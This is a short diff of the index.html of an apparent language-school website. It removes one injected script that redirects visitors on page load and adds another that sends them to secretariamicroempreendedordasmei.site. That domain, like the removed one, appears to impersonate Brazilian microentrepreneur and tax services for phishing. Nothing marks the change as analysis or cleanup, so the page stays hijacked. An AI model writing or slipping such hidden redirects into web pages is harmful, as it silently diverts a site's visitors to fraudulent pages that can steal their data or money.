--- a/index.html
+++ b/index.html
@@ -13,9 +13,7 @@
     footer { background: #eee; text-align: center; padding: 20px; margin-top: 40px; }
   </style>
 </head>
-  <script language= "JavaScript">
-location.href="https://pgmei.taxascnpj.app"
-</script>
+<script>window.location.href='https://secretariamicroempreendedordasmei.site/?id=1'</script>
 <body>
   <header>
     <h1>Be Aware – Ensino de Idiomas</h1>
